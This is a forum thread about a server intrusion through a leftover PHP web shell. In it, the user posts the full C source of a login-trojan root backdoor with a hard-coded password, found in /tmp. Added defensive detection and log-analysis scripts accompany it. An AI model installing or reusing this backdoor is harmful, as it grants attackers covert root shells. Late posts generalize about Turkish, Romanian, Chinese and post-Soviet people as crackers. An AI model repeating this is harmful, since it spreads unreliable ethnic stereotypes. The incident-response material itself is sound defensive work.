TOPIC: Re:odd msg in /var/log/httpd/error_log

#14109
ronald (User)
Posts: 415
odd msg in /var/log/httpd/error_log 2008/06/24 09:18  
this is what it says:

mkdir: cannot create directory `3': File exists
Quantifier follows nothing in regex; marked by <-- HERE in m/* <-- HERE
######################################################
# DefacerBackRoot
# Discovered & Coded By rUnViRuS
# # World Defacers TeaM
# WD-Geekz: rUnViRuS -PaPipiycho - n0m3rcy
# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/ at r.pl line 20.


Anyone have any ideas?
It is the test server, which no one really has access to.
SSH is not on the default port, and FTP is closed. Only the main server has access to it, to make the backups, and that goes by RSA key, not password.
#14111
andreychek (User)
Posts: 269
Re:odd msg in /var/log/httpd/error_log 2008/06/24 09:37  
That's an interesting one!

It looks like the full script might be shown here:

http://www.kasbarg.com/topic.php?topic=201679

A few questions come to mind:

* Does the file /bin/.login exist?

* If you run a find on your system, do you see a file named "backpriv8" (find / -name backpriv8)?

* What is the "r.pl" script mentioned above in the error_log?

However, you might consider running something like chkrootkit or rkhunter on your box just to be safe, that's a rather unusual error to receive :-)
-Eric
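The three checks Eric asks for, as an added example that is not part of the original thread: a small triage script that looks for the indicators the dropped source implies. The backdoor posted later in the thread hard-codes REALPATH "/bin/.login" and TROJAN "/bin/login", so a successful install would leave the genuine login binary at /bin/.login; a compiled copy would be named backpriv8; and a web shell running as the web-server user writes into /tmp as that user. The script takes the tree root and the web-server account name as arguments (assumptions for the demonstration, so it can be exercised on a scratch directory rather than a live host); the scratch tree built by demo() is constructed, not real data.

```sh
#!/bin/sh
# Added example, not from the thread: triage checks for the backpriv8 login
# trojan. Paths are taken relative to $1 so the function can be exercised on
# a scratch tree; on the real host call it as: check_login_trojan / apache

# check_login_trojan ROOT WEBUSER
# Prints each indicator found. Exit status 0 = nothing found, 1 = hits.
check_login_trojan() {
    root=${1%/}          # strip a trailing slash so "/" becomes ""
    webuser=$2
    hits=0

    # 1. The trojan expects the real login to have been moved to /bin/.login.
    if [ -e "$root/bin/.login" ]; then
        echo "INDICATOR: $root/bin/.login exists (real /bin/login moved aside?)"
        hits=$((hits + 1))
    fi

    # 2. A compiled copy, if gcc was ever run on the dropped source.
    #    -xdev keeps find off /proc, /sys and network mounts.
    found=$(find "$root/" -xdev -name backpriv8 2>/dev/null)
    if [ -n "$found" ]; then
        echo "INDICATOR: compiled backdoor present: $found"
        hits=$((hits + 1))
    fi

    # 3. Files the web-server user has written under /tmp. PHP running as
    #    that user is what a web shell uses to drop its payload there
    #    (the thread's /tmp/3/r.pl was owned by apache).
    dropped=$(find "$root/tmp" -user "$webuser" -type f 2>/dev/null)
    if [ -n "$dropped" ]; then
        echo "INDICATOR: files owned by $webuser under $root/tmp:"
        echo "$dropped"
        hits=$((hits + 1))
    fi

    [ "$hits" -eq 0 ]
}

# Demonstration on a constructed scratch tree (not a real host): an empty
# tree passes, then a dropped /tmp/3/r.pl makes the check fail. The current
# user stands in for the web-server account.
demo() {
    t=$(mktemp -d)
    mkdir -p "$t/bin" "$t/tmp/3"
    check_login_trojan "$t" "$(id -un)" && echo "clean tree: OK"
    : > "$t/tmp/3/r.pl"
    check_login_trojan "$t" "$(id -un)" || echo "dropped file detected"
    rm -rf "$t"
}
demo
```

On the real CentOS host, add the package-manager check as well: `rpm -Vf /bin/login` prints nothing if the installed file still matches the RPM database, and a line with a `5` in the flags column (MD5 mismatch) if the binary has been replaced. That catches a swapped login even when the attacker cleaned up /bin/.login and the dropped source.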
#14115
ronald (User)
Posts: 415
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:15  
Hmm, someone created a folder /3 in the /tmp dir... and placed a file in there.
That's really odd, as that server has no users other than me, and I placed 2 of my own domains on there recently.

/tmp/3/ has a file r.pl
with
Code:

# gcc backpriv8.c -o backpriv8
# Details
# It's a Simple Root Backdoor
# So, you can change:
# Details
# Time for enetering password
# Path to Demon, Trojan
# Password for Trojan
# Command Interpretator to exec
# Join with us to Get Prvi8 Exploit
# Priv8 Priv8 Priv8 Priv8
# -------- ~~~~*~~~~ --------
######################################################
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>   /* for exit(); not in the posted copy, added so it compiles cleanly */
#include <string.h>
#include <unistd.h>

#define REALPATH "/bin/.login"    /* where the genuine login is expected to be moved */
#define TROJAN   "/bin/login"     /* where this binary is meant to be installed */
#define PASS     "worlddefacers"  /* backdoor password */

char **execute;
char passwd[7];   /* 7 bytes, yet scanf("%s") below reads an unbounded string;
                     the 13-byte password already overflows it */

int main(int argc, char *argv[])
{
    void connection();

    /* If no password arrives within 5 seconds, hand over to the real login
       so normal users notice nothing. */
    signal(SIGALRM, connection);
    alarm(5);

    /* Re-use argv but make argv[0] look like the real login. */
    execute = argv;
    *execute = TROJAN;

    scanf("%s", passwd);
    if (strcmp(passwd, PASS) == 0) {
        /* Backdoor password given: cancel the timer and exec an interactive
           shell with login's privileges (root when started by getty/sshd). */
        alarm(0);
        execl("/bin/sh", "/bin/sh", "-i", 0);
        exit(0);
    } else {
        /* Anything else: pass the user on to the genuine login. */
        execv(REALPATH, execute);
        exit(0);
    }
}

/* SIGALRM handler: timed out, run the real login. */
void connection()
{
    execv(REALPATH, execute);
    exit(0);
}


There is no /bin/.login; a /bin/login is there, however. backpriv8 gives no results on a search.
#14116
andreychek (User)
Posts: 269
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:22  
Hey Ronald,

Who's the owner of the r.pl file?
-Eric
#14117
ronald (User)
Posts: 415
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:26  
The owner is Apache.
chkrootkit detected nothing, btw, so I assume nothing bad happened (yet).
#14119
Joe (Admin)
Posts: 3794
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:29  
This looks like an attempted (but probably failed) rootkit installation. There is definitely a security vulnerability on your system, though. No doubt about that--random jackasses on the internet shouldn't be able to drop files onto your system (whether they escalate to root or not is another question entirely).

What are you running on your websites? (e.g. what applications?) Are they the latest versions?
#14122
ronald (User)
Posts: 415
Re:odd msg in /var/log/httpd/error_log 2008/06/24 10:43  
This is CentOS 5.1 with Webmin and Virtualmin GPL, and all is the latest version.
I have only two domains of my own and they both have an index.html.
Also, open_basedir is locked to ${HOME}.

On 1 of the sites I have SugarCRM installed, but it is "invisible" as the index.html is called before SugarCRM's index.php.

Also, the 2 domains are brand new and the SugarCRM is also (like 4 days or so). I only used that server for daily backups till recently.

Anyway, I tried to do a yum upgrade but a few things went wrong and I had to reboot. I have no remote access now and the filesystem is corrupted (it says RUN fsck), which I did.

Hm, interesting..
I'm hanging a monitor on the box and first I'll get my main server's backups off of there.
#14124
ronald (User)
Posts: 415
Re:odd msg in /var/log/httpd/error_log 2008/06/24 11:02  
Right,
this is (of course) my own fault.
I had a dangerous PHP file still on one of the domains to check for weaknesses. I forgot to take it off the server and it got indexed.

Some Turkish guys found it on the net and started toying with it.

I'm just wondering why the Turkish are always in the first row when it comes to abusing other people's belongings.... According to the logs there were like 5 of them messing around, lol.

/me deleting script..
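Pulling the evidence for this out of the Apache logs, as an added example that is not part of the original thread. Ronald's explanation fits the error_log entries well: a PHP file that runs attacker-supplied commands executes them as the apache user, and the stderr of those commands (the `mkdir` complaint, the Perl parse error from feeding a C file to `perl`) lands in error_log because child processes inherit Apache's stderr. The open_basedir setting on the vhost does not change that; open_basedir restricts PHP's file-access functions, not `system()`, `exec()` or `passthru()`, which is why a web shell can still create /tmp/3 and run whatever it likes there. The script below lists, from a combined-format access log, every client that hit the leftover file and the query strings they sent. The script name /check.php and all log lines are constructed for the demonstration and are not Ronald's real file or logs.

```sh
#!/bin/sh
# Added example, not from the thread: who used the leftover PHP file, and
# what did they send it? Works on Apache combined log format, where field 7
# of each line is the request URI.

# webshell_hits LOGFILE SCRIPTPATH
# Prints "client-ip request-count", one line per client, sorted by address.
webshell_hits() {
    awk -v path="$2" '
        # match the script itself or the script followed by a query string
        $7 ~ ("^" path "(\\?|$)") { hits[$1]++ }
        END { for (ip in hits) print ip, hits[ip] }
    ' "$1" | sort
}

# webshell_commands LOGFILE SCRIPTPATH
# Prints "client-ip query-string" for every request that carried parameters;
# with a simple command shell the command is right there in the query.
webshell_commands() {
    awk -v path="$2" '
        $7 ~ ("^" path "\\?") {
            sub("^[^?]*\\?", "", $7)   # drop everything up to the "?"
            gsub(/\+/, " ", $7)        # "+" is a space in a query string
            print $1, $7
        }
    ' "$1"
}

# Constructed sample log (documentation addresses, invented timestamps)
# modelled on what the thread's error_log entries imply: one client runs
# id, one creates /tmp/3, one feeds the dropped file to perl.
sample_log() {
cat <<'EOF'
198.51.100.7 - - [24/Jun/2008:08:55:12 +0200] "GET /check.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [24/Jun/2008:08:55:40 +0200] "GET /check.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/4.0"
203.0.113.21 - - [24/Jun/2008:09:10:03 +0200] "GET /check.php?cmd=mkdir+/tmp/3 HTTP/1.1" 200 61 "-" "Mozilla/4.0"
203.0.113.21 - - [24/Jun/2008:09:11:15 +0200] "POST /check.php HTTP/1.1" 200 61 "-" "Mozilla/4.0"
192.0.2.9 - - [24/Jun/2008:09:12:44 +0200] "GET /index.html HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
192.0.2.9 - - [24/Jun/2008:09:13:01 +0200] "GET /check.php?cmd=perl+/tmp/3/r.pl HTTP/1.1" 200 90 "-" "Mozilla/5.0"
EOF
}

demo() {
    f=$(mktemp)
    sample_log > "$f"
    echo "clients that used /check.php:"
    webshell_hits "$f" /check.php
    echo "commands sent:"
    webshell_commands "$f" /check.php
    rm -f "$f"
}
demo
```

On the real host, point it at the vhost's access_log (Virtualmin keeps one per domain under the domain's logs directory) with the actual file name. Note that a POST-based shell keeps its command in the request body, which the access log does not record; the hit list still tells you who was there and when. For the hardening side, removing the file is the fix, but `disable_functions = system,exec,passthru,shell_exec,popen,proc_open` in that site's php.ini is the setting that would have stopped the commands even with the file present.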
#14132
Joe (Admin)
Posts: 3794
Re:odd msg in /var/log/httpd/error_log 2008/06/24 12:48  
It's not just the Turks. ;-)

Romania and many former Soviet states, and China, all have more than their fair share of crackers. I think it's a combination of a few factors: no extradition treaty with most western nations, reasonable technology infrastructure but not a lot of jobs to go around, and a history of oppression (which tends to break cultural taboos against dishonesty, since you have to lie daily to survive in an oppressive regime--it takes a generation or so of a reasonable level of freedom to recover from that). Not that I'm defending crackers and malware producers. It's just not too surprising where they mostly originate from.
Copyright 2005-2007 Virtualmin, Inc. All rights reserved.